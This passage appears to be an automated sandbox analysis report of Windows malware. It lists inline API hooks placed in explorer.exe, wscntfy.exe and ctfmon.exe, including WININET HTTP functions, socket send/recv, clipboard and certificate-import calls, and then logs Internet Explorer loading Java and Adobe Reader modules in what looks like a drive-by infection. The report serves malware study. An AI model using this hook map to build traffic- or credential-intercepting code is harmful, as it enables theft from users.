SetCursorPos INLINE explorer.exe, wscntfy.exe, ctfmon.exe
ReleaseCapture INLINE explorer.exe, wscntfy.exe, ctfmon.exe
ZwCreateThread INLINE explorer.exe, wscntfy.exe, ctfmon.exe
LdrLoadDll INLINE explorer.exe, wscntfy.exe, ctfmon.exe
NtCreateThread INLINE explorer.exe, wscntfy.exe, ctfmon.exe
InternetReadFile INLINE explorer.exe
HttpSendRequestA INLINE explorer.exe
HttpSendRequestW INLINE explorer.exe
InternetSetStatusCallbackW INLINE explorer.exe
InternetSetStatusCallbackA INLINE explorer.exe
InternetQueryDataAvailable INLINE explorer.exe
InternetReadFileExA INLINE explorer.exe
InternetSetStatusCallback INLINE explorer.exe
HttpSendRequestExA INLINE explorer.exe
HttpQueryInfoA INLINE explorer.exe
InternetSetOptionA INLINE explorer.exe
HttpSendRequestExW INLINE explorer.exe
InternetCloseHandle INLINE explorer.exe
closesocket INLINE explorer.exe
WSARecv INLINE explorer.exe
send INLINE explorer.exe
recv INLINE explorer.exe
WSASend INLINE explorer.exe
PFXImportCertStore INLINE explorer.exe
+ Processes
+ Process: explorer.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x94 0x47 0x7E 0xE5 0x50
CallWindowProcA INLINE 0xE9 0x9B 0xB9 0x9F 0xF3 0x30
CallWindowProcW INLINE 0xE9 0x9C 0xCF 0xFF 0xFC 0xC0
EndPaint INLINE 0xE9 0x9B 0xBA 0xAF 0xFC 0xC0
GetUpdateRgn INLINE 0xE9 0x9B 0xB7 0x79 0x98 0x80
GetDCEx INLINE 0xE9 0x96 0x62 0x2C 0xC7 0x70
GetCapture INLINE 0xE9 0x9D 0xD2 0x2A 0xA7 0x70
DefWindowProcW INLINE 0xE9 0x99 0x97 0x70 0x0D 0xD0
GetMessageA INLINE 0xE9 0x94 0x48 0x8C 0xC6 0x60
GetMessageW INLINE 0xE9 0x98 0x85 0x5A 0xAB 0xB0
DefDlgProcA INLINE 0xE9 0x91 0x12 0x2B 0xB6 0x60
GetDC INLINE 0xE9 0x98 0x8B 0xB0 0x06 0x60
DefDlgProcW INLINE 0xE9 0x90 0x09 0x95 0x5E 0xE0
DefWindowProcA INLINE 0xE9 0x97 0x7F 0xFD 0xD9 0x90
GetClipboardData INLINE 0xE9 0x9E 0xE4 0x43 0x35 0x50
OpenInputDesktop INLINE 0xE9 0x9A 0xA6 0x6A 0xAD 0xD0
PeekMessageA INLINE 0xE9 0x98 0x86 0x69 0x9A 0xA0
PeekMessageW INLINE 0xE9 0x90 0x00 0x0A 0xAB 0xB0
RegisterClassW INLINE 0xE9 0x92 0x21 0x1F 0xFA 0xA0
RegisterClassA INLINE 0xE9 0x9A 0xAA 0xAB 0xB3 0x30
GetWindowDC INLINE 0xE9 0x97 0x70 0x0F 0xFD 0xD0
ReleaseDC INLINE 0xE9 0x93 0x33 0x30 0x07 0x70
SetCapture INLINE 0xE9 0x9A 0xA4 0x47 0x78 0x80
DefMDIChildProcA INLINE 0xE9 0x9F 0xF3 0x3A 0xA2 0x20
DefMDIChildProcW INLINE 0xE9 0x91 0x1A 0xA9 0x92 0x20
DefFrameProcA INLINE 0xE9 0x9B 0xB3 0x3A 0xA2 0x20
DefFrameProcW INLINE 0xE9 0x99 0x9C 0xC9 0x93 0x30
RegisterClassExW INLINE 0xE9 0x9D 0xD6 0x6E 0xEE 0xE0
TranslateMessage INLINE 0xE9 0x93 0x3F 0xFB 0xB6 0x60
BeginPaint INLINE 0xE9 0x95 0x5E 0xEF 0xFC 0xC0
RegisterClassExA INLINE 0xE9 0x96 0x6E 0xE2 0x22 0x20
GetCursorPos INLINE 0xE9 0x93 0x30 0x0A 0xA4 0x40
GetMessagePos INLINE 0xE9 0x9E 0xE0 0x0A 0xA1 0x10
SwitchDesktop INLINE 0xE9 0x92 0x2B 0xB9 0x9C 0xC0
SetCursorPos INLINE 0xE9 0x91 0x12 0x2D 0xDA 0xA0
ReleaseCapture INLINE 0xE9 0x9E 0xE2 0x27 0x78 0x80
+ Process: explorer.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xEB
LdrLoadDll INLINE 0xE9 0x90 0x09 0x91 0x1F 0xFB
NtCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xEB
+ Process: explorer.exe, Module: WININET.dll
Function Name Hook Type New Data
InternetReadFile INLINE 0xE9 0x90 0x0A 0xAF 0xFA 0xA2
HttpSendRequestA INLINE 0xE9 0x96 0x6F 0xF1 0x1A 0xA2
HttpSendRequestW INLINE 0xE9 0x9F 0xFD 0xD4 0x4B 0xB2
InternetSetStatusCallbackW INLINE 0xE9 0x9B 0xB4 0x4E 0xE1 0x12
InternetSetStatusCallbackA INLINE 0xE9 0x9B 0xBB 0xBE 0xED 0xD2
InternetQueryDataAvailable INLINE 0xE9 0x98 0x8B 0xBF 0xF3 0x32
InternetReadFileExA INLINE 0xE9 0x93 0x34 0x4E 0xEC 0xC2
InternetSetStatusCallback INLINE 0xE9 0x9B 0xBB 0xBE 0xED 0xD2
HttpSendRequestExA INLINE 0xE9 0x94 0x4B 0xB4 0x4C 0xC2
HttpQueryInfoA INLINE 0xE9 0x9F 0xF0 0x00 0x03 0x32
InternetSetOptionA INLINE 0xE9 0x95 0x5F 0xFC 0xCC 0xC2
HttpSendRequestExW INLINE 0xE9 0x9A 0xA6 0x69 0x91 0x12
InternetCloseHandle INLINE 0xE9 0x92 0x25 0x52 0x2F 0xF2
+ Process: explorer.exe, Module: WS2_32.dll
Function Name Hook Type New Data
closesocket INLINE 0xE9 0x93 0x3E 0xEE 0xE9 0x99
WSARecv INLINE 0xE9 0x9F 0xFA 0xAD 0xDB 0xB9
send INLINE 0xE9 0x99 0x94 0x4D 0xDB 0xB9
recv INLINE 0xE9 0x9F 0xF8 0x8C 0xC0 0x09
WSASend INLINE 0xE9 0x9F 0xFB 0xBB 0xBE 0xE9
+ Process: explorer.exe, Module: CRYPT32.dll
Function Name Hook Type New Data
PFXImportCertStore INLINE 0xE9 0x97 0x7A 0xA1 0x19 0x99
+ Process: wscntfy.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x94 0x47 0x7E 0xE5 0x56
CallWindowProcA INLINE 0xE9 0x9B 0xB9 0x9F 0xF3 0x36
CallWindowProcW INLINE 0xE9 0x9C 0xCF 0xFF 0xFC 0xC6
EndPaint INLINE 0xE9 0x9B 0xBA 0xAF 0xFC 0xC6
GetUpdateRgn INLINE 0xE9 0x9B 0xB7 0x79 0x98 0x86
GetDCEx INLINE 0xE9 0x96 0x62 0x2C 0xC7 0x76
GetCapture INLINE 0xE9 0x9D 0xD2 0x2A 0xA7 0x76
DefWindowProcW INLINE 0xE9 0x99 0x97 0x70 0x0D 0xD6
GetMessageA INLINE 0xE9 0x94 0x48 0x8C 0xC6 0x66
GetMessageW INLINE 0xE9 0x98 0x85 0x5A 0xAB 0xB6
DefDlgProcA INLINE 0xE9 0x91 0x12 0x2B 0xB6 0x66
GetDC INLINE 0xE9 0x98 0x8B 0xB0 0x06 0x66
DefDlgProcW INLINE 0xE9 0x90 0x09 0x95 0x5E 0xE6
DefWindowProcA INLINE 0xE9 0x97 0x7F 0xFD 0xD9 0x96
GetClipboardData INLINE 0xE9 0x9E 0xE4 0x43 0x35 0x56
OpenInputDesktop INLINE 0xE9 0x9A 0xA6 0x6A 0xAD 0xD6
PeekMessageA INLINE 0xE9 0x98 0x86 0x69 0x9A 0xA6
PeekMessageW INLINE 0xE9 0x90 0x00 0x0A 0xAB 0xB6
RegisterClassW INLINE 0xE9 0x92 0x21 0x1F 0xFA 0xA6
RegisterClassA INLINE 0xE9 0x9A 0xAA 0xAB 0xB3 0x36
GetWindowDC INLINE 0xE9 0x97 0x70 0x0F 0xFD 0xD6
ReleaseDC INLINE 0xE9 0x93 0x33 0x30 0x07 0x76
SetCapture INLINE 0xE9 0x9A 0xA4 0x47 0x78 0x86
DefMDIChildProcA INLINE 0xE9 0x9F 0xF3 0x3A 0xA2 0x26
DefMDIChildProcW INLINE 0xE9 0x91 0x1A 0xA9 0x92 0x26
DefFrameProcA INLINE 0xE9 0x9B 0xB3 0x3A 0xA2 0x26
DefFrameProcW INLINE 0xE9 0x99 0x9C 0xC9 0x93 0x36
RegisterClassExW INLINE 0xE9 0x9D 0xD6 0x6E 0xEE 0xE6
TranslateMessage INLINE 0xE9 0x93 0x3F 0xFB 0xB6 0x66
BeginPaint INLINE 0xE9 0x95 0x5E 0xEF 0xFC 0xC6
RegisterClassExA INLINE 0xE9 0x96 0x6E 0xE2 0x22 0x26
GetCursorPos INLINE 0xE9 0x93 0x30 0x0A 0xA4 0x46
GetMessagePos INLINE 0xE9 0x9E 0xE0 0x0A 0xA1 0x16
SwitchDesktop INLINE 0xE9 0x92 0x2B 0xB9 0x9C 0xC6
SetCursorPos INLINE 0xE9 0x91 0x12 0x2D 0xDA 0xA6
ReleaseCapture INLINE 0xE9 0x9E 0xE2 0x27 0x78 0x86
+ Process: wscntfy.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xE1
LdrLoadDll INLINE 0xE9 0x90 0x09 0x91 0x1F 0xF1
NtCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xE1
+ Process: ctfmon.exe, Module: USER32.dll
Function Name Hook Type New Data
GetUpdateRect INLINE 0xE9 0x94 0x47 0x7E 0xE5 0x5C
CallWindowProcA INLINE 0xE9 0x9B 0xB9 0x9F 0xF3 0x3C
CallWindowProcW INLINE 0xE9 0x9C 0xCF 0xFF 0xFC 0xCC
EndPaint INLINE 0xE9 0x9B 0xBA 0xAF 0xFC 0xCC
GetUpdateRgn INLINE 0xE9 0x9B 0xB7 0x79 0x98 0x8C
GetDCEx INLINE 0xE9 0x96 0x62 0x2C 0xC7 0x7C
GetCapture INLINE 0xE9 0x9D 0xD2 0x2A 0xA7 0x7D
DefWindowProcW INLINE 0xE9 0x99 0x97 0x70 0x0D 0xDD
GetMessageA INLINE 0xE9 0x94 0x48 0x8C 0xC6 0x6C
GetMessageW INLINE 0xE9 0x98 0x85 0x5A 0xAB 0xBD
DefDlgProcA INLINE 0xE9 0x91 0x12 0x2B 0xB6 0x6C
GetDC INLINE 0xE9 0x98 0x8B 0xB0 0x06 0x6D
DefDlgProcW INLINE 0xE9 0x90 0x09 0x95 0x5E 0xED
DefWindowProcA INLINE 0xE9 0x97 0x7F 0xFD 0xD9 0x9C
GetClipboardData INLINE 0xE9 0x9E 0xE4 0x43 0x35 0x5C
OpenInputDesktop INLINE 0xE9 0x9A 0xA6 0x6A 0xAD 0xDD
PeekMessageA INLINE 0xE9 0x98 0x86 0x69 0x9A 0xAC
PeekMessageW INLINE 0xE9 0x90 0x00 0x0A 0xAB 0xBD
RegisterClassW INLINE 0xE9 0x92 0x21 0x1F 0xFA 0xAD
RegisterClassA INLINE 0xE9 0x9A 0xAA 0xAB 0xB3 0x3C
GetWindowDC INLINE 0xE9 0x97 0x70 0x0F 0xFD 0xDD
ReleaseDC INLINE 0xE9 0x93 0x33 0x30 0x07 0x7D
SetCapture INLINE 0xE9 0x9A 0xA4 0x47 0x78 0x8C
DefMDIChildProcA INLINE 0xE9 0x9F 0xF3 0x3A 0xA2 0x2C
DefMDIChildProcW INLINE 0xE9 0x91 0x1A 0xA9 0x92 0x2C
DefFrameProcA INLINE 0xE9 0x9B 0xB3 0x3A 0xA2 0x2C
DefFrameProcW INLINE 0xE9 0x99 0x9C 0xC9 0x93 0x3C
RegisterClassExW INLINE 0xE9 0x9D 0xD6 0x6E 0xEE 0xED
TranslateMessage INLINE 0xE9 0x93 0x3F 0xFB 0xB6 0x6D
BeginPaint INLINE 0xE9 0x95 0x5E 0xEF 0xFC 0xCC
RegisterClassExA INLINE 0xE9 0x96 0x6E 0xE2 0x22 0x2D
GetCursorPos INLINE 0xE9 0x93 0x30 0x0A 0xA4 0x4C
GetMessagePos INLINE 0xE9 0x9E 0xE0 0x0A 0xA1 0x1C
SwitchDesktop INLINE 0xE9 0x92 0x2B 0xB9 0x9C 0xCD
SetCursorPos INLINE 0xE9 0x91 0x12 0x2D 0xDA 0xAC
ReleaseCapture INLINE 0xE9 0x9E 0xE2 0x27 0x78 0x8C
+ Process: ctfmon.exe, Module: ntdll.dll
Function Name Hook Type New Data
ZwCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xE8
LdrLoadDll INLINE 0xE9 0x90 0x09 0x91 0x1F 0xF8
NtCreateThread INLINE 0xE9 0x9A 0xA4 0x4A 0xAE 0xE8
+ Sections
+ General
Start time: 05:43:09
Start date: 08/12/2011
Path: C:\Program Files\Internet Explorer\iexplore.exe
Commandline: not known
Imagebase: 0x400000
File size: 93184 bytes
MD5 hash: 55794B97A7FAABD2910873C85274F409
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 801A4FF
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
C:\WINDOWS\system32\jscript.dll write and read and execute commit 2340000 512000 own pid execute success or wait 1
C:\WINDOWS\system32\jscript.dll query and write and read and execute image 75C50000 512000 own pid read write success or wait 1
C:\WINDOWS\system32\mshtml.tlb query and read commit 3A60000 1351680 own pid readonly success or wait 1
C:\WINDOWS\system32\msxml3.dll write and read and execute commit 3BB0000 1175552 own pid execute success or wait 1
C:\WINDOWS\system32\msxml3.dll query and write and read and execute image 74980000 1191936 own pid read write success or wait 1
C:\WINDOWS\system32\msxml3r.dll write and read and execute commit 4080000 45056 own pid execute success or wait 1
C:\WINDOWS\system32\msxml3r.dll query and read commit 4080000 45056 own pid readonly success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\JavaWebStart.dll write and read and execute commit 4090000 139264 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\JavaWebStart.dll query and write and read and execute image 6D320000 143360 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\NPJPI150_01.dll write and read and execute commit 41A0000 73728 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\NPJPI150_01.dll query and write and read and execute image 6D590000 69632 own pid read write success or wait 1
\KnownDlls\OLEPRO32.DLL write and read and execute unknown 6D590000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\olepro32.dll query and write and read and execute image 5EDD0000 94208 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpiexp32.dll write and read and execute commit 41A0000 98304 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpiexp32.dll query and write and read and execute image 6D400000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 41A0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpishare.dll write and read and execute commit 41B0000 81920 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpishare.dll query and write and read and execute image 6D450000 98304 own pid read write success or wait 1
\KnownDlls\shfolder.dll write and read and execute unknown 6D450000 98304 own pid read write object name not found 1
C:\WINDOWS\system32\shfolder.dll query and write and read and execute image 76780000 36864 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\jvm.dll write and read and execute commit 41B0000 1527808 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\jvm.dll query and write and read and execute image 6D640000 1593344 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\hpi.dll write and read and execute commit 41C0000 36864 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\hpi.dll query and write and read and execute image 6D280000 32768 own pid read write success or wait 1
\BaseNamedObjects\hsperfdata_Administrator_1712 query and write and read commit 41C0000 65536 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\verify.dll write and read and execute commit 41D0000 53248 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\verify.dll query and write and read and execute image 6D610000 49152 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\java.dll write and read and execute commit 41D0000 122880 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\java.dll query and write and read and execute image 6D300000 118784 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\zip.dll write and read and execute commit 41D0000 65536 own pid execute success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\zip.dll query and write and read and execute image 6D630000 61440 own pid read write success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa query and read commit 2AA80000 5308416 own pid readonly success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa query and read commit 2B280000 5832704 own pid write copy success or wait 1
C:\PROGRA~1\Java\JRE15~1.0_0\bin\client\classes.jsa query and read commit 2BE80000 851968 own pid write copy success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\zip.dll write and read and execute commit 6A30000 65536 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\awt.dll write and read and execute commit 6E30000 1331200 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\awt.dll query and write and read and execute image 6D000000 1466368 own pid read write success or wait 1
\KnownDlls\ddraw.dll write and read and execute unknown 6D000000 1466368 own pid read write object name not found 1
C:\WINDOWS\system32\ddraw.dll query and write and read and execute image 73760000 307200 own pid read write success or wait 1
\KnownDlls\DCIMAN32.dll write and read and execute unknown 73760000 307200 own pid read write object name not found 1
C:\WINDOWS\system32\dciman32.dll query and write and read and execute image 73BC0000 24576 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\fontmanager.dll write and read and execute commit 6E30000 253952 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\fontmanager.dll query and write and read and execute image 6D240000 249856 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\deploy.dll write and read and execute commit 7130000 69632 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\deploy.dll query and write and read and execute image 6D1F0000 77824 own pid read write success or wait 1
\KnownDlls\shfolder.dll write and read and execute unknown 6D1F0000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\shfolder.dll query and write and read and execute image 76780000 36864 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\RegUtils.dll write and read and execute commit 7340000 122880 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\RegUtils.dll query and write and read and execute image 6D5D0000 118784 own pid read write success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpicom32.dll write and read and execute commit 7440000 86016 own pid execute success or wait 1
C:\Program Files\Java\jre1.5.0_01\bin\jpicom32.dll query and write and read and execute image 6D3E0000 81920 own pid read write success or wait 1
C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll write and read and execute commit 6F30000 634880 own pid execute success or wait 1
C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll query and write and read and execute image 6F30000 626688 own pid read write conflicting addresses 1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll query and write and read and execute image 7C420000 552960 own pid read write success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe write and read and execute commit 7830000 344064 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7830000 344064 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe write and read and execute commit 7830000 344064 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7830000 344064 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and write and read and execute and extend size image 7830000 344064 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 7830000 1208320 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe write and read and execute commit 7960000 344064 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7960000 344064 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe write and read and execute commit 7960000 344064 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7960000 344064 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe query and read commit 7830000 344064 own pid readonly success or wait 1
C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroPDF.dll query and read commit 6FF0000 49152 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api write and read and execute commit 7830000 356352 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api query and read commit 7830000 356352 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api write and read and execute commit 7830000 356352 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api query and read commit 7830000 356352 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api write and read and execute commit 7830000 8658944 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api query and read commit 7830000 8658944 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api write and read and execute commit 7830000 8658944 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api query and read commit 7830000 8658944 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api write and read and execute commit 7830000 4124672 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api query and read commit 7830000 4124672 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api write and read and execute commit 7830000 4124672 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api query and read commit 7830000 4124672 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api write and read and execute commit 7830000 839680 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api query and read commit 7830000 839680 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api write and read and execute commit 7830000 839680 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api query and read commit 7830000 839680 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api write and read and execute commit 7830000 1150976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api query and read commit 7830000 1150976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api write and read and execute commit 7830000 1150976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api query and read commit 7830000 1150976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api write and read and execute commit 7000000 53248 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api query and read commit 7000000 53248 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api write and read and execute commit 7000000 53248 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api query and read commit 7000000 53248 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api write and read and execute commit 7830000 1417216 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api query and read commit 7830000 1417216 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api write and read and execute commit 7830000 1417216 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api query and read commit 7830000 1417216 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api write and read and execute commit 7000000 126976 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api query and read commit 7000000 126976 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api write and read and execute commit 7000000 53248 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api query and read commit 7000000 53248 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api write and read and execute commit 7000000 53248 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api query and read commit 7000000 53248 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api write and read and execute commit 7000000 86016 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api query and read commit 7000000 86016 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api write and read and execute commit 7000000 86016 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api query and read commit 7000000 86016 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API write and read and execute commit 7830000 471040 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API query and read commit 7830000 471040 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API write and read and execute commit 7830000 471040 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API query and read commit 7830000 471040 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api write and read and execute commit 7830000 2035712 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api query and read commit 7830000 2035712 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api write and read and execute commit 7830000 2035712 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api query and read commit 7830000 2035712 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api write and read and execute commit 7830000 1347584 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api query and read commit 7830000 1347584 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api write and read and execute commit 7830000 1347584 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api query and read commit 7830000 1347584 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api write and read and execute commit 7830000 401408 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api query and read commit 7830000 401408 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api write and read and execute commit 7830000 401408 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api query and read commit 7830000 401408 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api write and read and execute commit 7830000 5771264 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api query and read commit 7830000 5771264 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api write and read and execute commit 7830000 5771264 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api query and read commit 7830000 5771264 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api write and read and execute commit 7000000 110592 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api query and read commit 7000000 110592 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api write and read and execute commit 7000000 110592 own pid execute success or wait 1
